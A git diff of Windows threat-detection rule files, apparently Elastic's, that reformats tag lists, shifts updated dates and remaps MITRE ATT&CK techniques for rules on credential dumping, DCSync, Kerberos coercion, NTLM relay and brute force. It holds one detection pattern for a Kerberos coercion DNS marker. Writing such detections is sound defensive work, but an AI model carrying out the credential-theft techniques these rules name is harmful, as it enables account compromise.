[[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/windows/command_and_control_velociraptor_shell_execution.toml b/rules/windows/command_and_control_velociraptor_shell_execution.toml index 3669963ad8b..e3a239e9797 100644 --- a/rules/windows/command_and_control_velociraptor_shell_execution.toml +++ b/rules/windows/command_and_control_velociraptor_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/18" [rule] author = ["Elastic"] @@ -55,7 +55,22 @@ references = [ risk_score = 47 rule_id = "9aeca498-1e3d-4496-9e12-6ef40047eb23" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs" +] timestamp_override = "event.ingested" type = "eql" @@ -75,36 +90,17 @@ process where host.os.type == "windows" and event.type == "start" and process.co [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" +[[rule.threat.technique.subtechnique]] +id = "T1219.002" +name = "Remote Desktop Software" +reference = "https://attack.mitre.org/techniques/T1219/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/credential_access_adidns_wildcard.toml b/rules/windows/credential_access_adidns_wildcard.toml index 6a18ecf1e11..e3c6af87519 100644 --- a/rules/windows/credential_access_adidns_wildcard.toml +++ b/rules/windows/credential_access_adidns_wildcard.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -83,7 +83,16 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=MicrosoftDNS,DC=DomainDNSZones,DC=Domain,DC ``` """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -95,26 +104,14 @@ any where host.os.type == "windows" and event.code == "5137" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_browsers_unusual_parent.toml b/rules/windows/credential_access_browsers_unusual_parent.toml index 44ceeb7b2a5..7ba940e2c6d 100644 --- a/rules/windows/credential_access_browsers_unusual_parent.toml +++ b/rules/windows/credential_access_browsers_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/27" integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/27" [rule] author = ["Elastic"] @@ -62,7 +62,19 @@ references = ["https://www.elastic.co/security-labs/katz-and-mouse-game"] risk_score = 73 rule_id = "46b01bb5-cff2-4a00-9f87-c041d9eab554" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -96,25 +108,10 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1185" -name = "Browser Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1185/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [[rule.threat.technique.subtechnique]] id = "T1555.003" name = "Credentials from Web Browsers" @@ -124,3 +121,5 @@ reference = "https://attack.mitre.org/techniques/T1555/003/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + + diff --git a/rules/windows/credential_access_bruteforce_admin_account.toml b/rules/windows/credential_access_bruteforce_admin_account.toml index 9282a6ec9af..11bbd6482f2 100644 --- a/rules/windows/credential_access_bruteforce_admin_account.toml +++ b/rules/windows/credential_access_bruteforce_admin_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/09" [transform] [[transform.osquery]] @@ -135,18 +135,24 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml b/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml index b1d6834d68b..d53b19cc348 100644 --- a/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml +++ b/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/09" [transform] [[transform.osquery]] @@ -150,18 +150,24 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_cmdline_dump_tool.toml b/rules/windows/credential_access_cmdline_dump_tool.toml index fc208976de4..1c55bf1c603 100644 --- a/rules/windows/credential_access_cmdline_dump_tool.toml +++ b/rules/windows/credential_access_cmdline_dump_tool.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/24" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -65,7 +65,20 @@ references = [ risk_score = 73 rule_id = "00140285-b827-4aee-aa09-8113f58a08f3" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -107,12 +120,10 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" @@ -123,7 +134,27 @@ id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/credential_access_dcsync_newterm_subjectuser.toml b/rules/windows/credential_access_dcsync_newterm_subjectuser.toml index f694907853e..84f640f4534 100644 --- a/rules/windows/credential_access_dcsync_newterm_subjectuser.toml +++ b/rules/windows/credential_access_dcsync_newterm_subjectuser.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/19" integration = ["windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -80,7 +80,17 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Credential Access", "Data Source: Active Directory", "Resources: Investigation Guide", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "new_terms" @@ -96,21 +106,39 @@ event.code:"4662" and host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.006" name = "DCSync" reference = "https://attack.mitre.org/techniques/T1003/006/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] diff --git a/rules/windows/credential_access_dcsync_replication_rights.toml b/rules/windows/credential_access_dcsync_replication_rights.toml index 63a8203908d..43c9f1c9b13 100644 --- a/rules/windows/credential_access_dcsync_replication_rights.toml +++ b/rules/windows/credential_access_dcsync_replication_rights.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/08" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -87,7 +87,17 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "new_terms" @@ -104,21 +114,39 @@ host.os.type:"windows" and event.code:"4662" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.006" name = "DCSync" reference = "https://attack.mitre.org/techniques/T1003/006/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserSid", "winlog.event_data.ObjectName"] diff --git a/rules/windows/credential_access_dcsync_user_backdoor.toml b/rules/windows/credential_access_dcsync_user_backdoor.toml index 836c3cce9ff..e220648179d 100644 --- a/rules/windows/credential_access_dcsync_user_backdoor.toml +++ b/rules/windows/credential_access_dcsync_user_backdoor.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -78,7 +78,16 @@ references = [ risk_score = 47 rule_id = "f8822053-a5d2-46db-8c96-d460b12c36ac" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -97,26 +106,19 @@ event.code:"5136" and host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.006" +name = "DCSync" +reference = "https://attack.mitre.org/techniques/T1003/006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_disable_kerberos_preauth.toml b/rules/windows/credential_access_disable_kerberos_preauth.toml index 75151aa640e..f69365d6a48 100644 --- a/rules/windows/credential_access_disable_kerberos_preauth.toml +++ b/rules/windows/credential_access_disable_kerberos_preauth.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -68,7 +68,18 @@ Audit User Account Management (Success,Failure) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Active Directory", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -80,18 +91,48 @@ any where host.os.type == "windows" and event.code == "4738" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [[rule.threat.technique.subtechnique]] id = "T1558.004" name = "AS-REP Roasting" reference = "https://attack.mitre.org/techniques/T1558/004/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/credential_access_dnsnode_creation.toml b/rules/windows/credential_access_dnsnode_creation.toml index 565abdd5b21..4dd21727dec 100644 --- a/rules/windows/credential_access_dnsnode_creation.toml +++ b/rules/windows/credential_access_dnsnode_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -83,7 +83,16 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=MicrosoftDNS,DC=DomainDNSZones,DC=Domain,DC ``` """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -95,26 +104,14 @@ any where host.os.type == "windows" and event.code == "5137" and winlog.event_da [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_dollar_account_relay.toml b/rules/windows/credential_access_dollar_account_relay.toml index 502e066b3aa..c0418104f42 100644 --- a/rules/windows/credential_access_dollar_account_relay.toml +++ b/rules/windows/credential_access_dollar_account_relay.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/11" [rule] author = ["Elastic"] @@ -92,13 +92,24 @@ authentication where host.os.type == "windows" and event.code in ("4624", "4625" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_dollar_account_relay_kerberos.toml b/rules/windows/credential_access_dollar_account_relay_kerberos.toml index 60bb3d0ce29..0a76152c2fc 100644 --- a/rules/windows/credential_access_dollar_account_relay_kerberos.toml +++ b/rules/windows/credential_access_dollar_account_relay_kerberos.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/18" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/17" [rule] author = ["Elastic"] @@ -106,7 +106,6 @@ sequence by winlog.computer_name, source.ip with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" @@ -116,8 +115,15 @@ reference = "https://attack.mitre.org/techniques/T1187/" id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml index 775ef530d84..25f74db6270 100644 --- a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml +++ b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/13" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -57,18 +57,24 @@ file where host.os.type == "windows" and event.type != "deletion" and file.name [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" + +[[rule.threat.technique]] +id = "T1555" +name = "Credentials from Password Stores" +reference = "https://attack.mitre.org/techniques/T1555/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_generic_localdumps.toml b/rules/windows/credential_access_generic_localdumps.toml index 82ee68e5f2d..01dd1f39038 100644 --- a/rules/windows/credential_access_generic_localdumps.toml +++ b/rules/windows/credential_access_generic_localdumps.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/28" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -66,7 +66,17 @@ references = [ risk_score = 47 rule_id = "220be143-5c67-4fdb-b6ce-dd6826d024fd" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -83,31 +93,31 @@ registry where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/credential_access_iis_connectionstrings_dumping.toml b/rules/windows/credential_access_iis_connectionstrings_dumping.toml index 7775110a00d..ad8287b9688 100644 --- a/rules/windows/credential_access_iis_connectionstrings_dumping.toml +++ b/rules/windows/credential_access_iis_connectionstrings_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -95,18 +95,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_kerberos_coerce.toml b/rules/windows/credential_access_kerberos_coerce.toml index e1d5f33af2f..0ddf57939c2 100644 --- a/rules/windows/credential_access_kerberos_coerce.toml +++ b/rules/windows/credential_access_kerberos_coerce.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/14" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -103,18 +103,24 @@ host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" + [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" reference = "https://attack.mitre.org/techniques/T1187/" -[[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_kerberos_coerce_dns.toml b/rules/windows/credential_access_kerberos_coerce_dns.toml index 105f030b494..0269e12bbd3 100644 --- a/rules/windows/credential_access_kerberos_coerce_dns.toml +++ b/rules/windows/credential_access_kerberos_coerce_dns.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/14" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/06/14" [transform] [[transform.investigate]] @@ -95,13 +95,24 @@ network where host.os.type == "windows" and dns.question.name : "*UWhRC*BAAAA*" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" 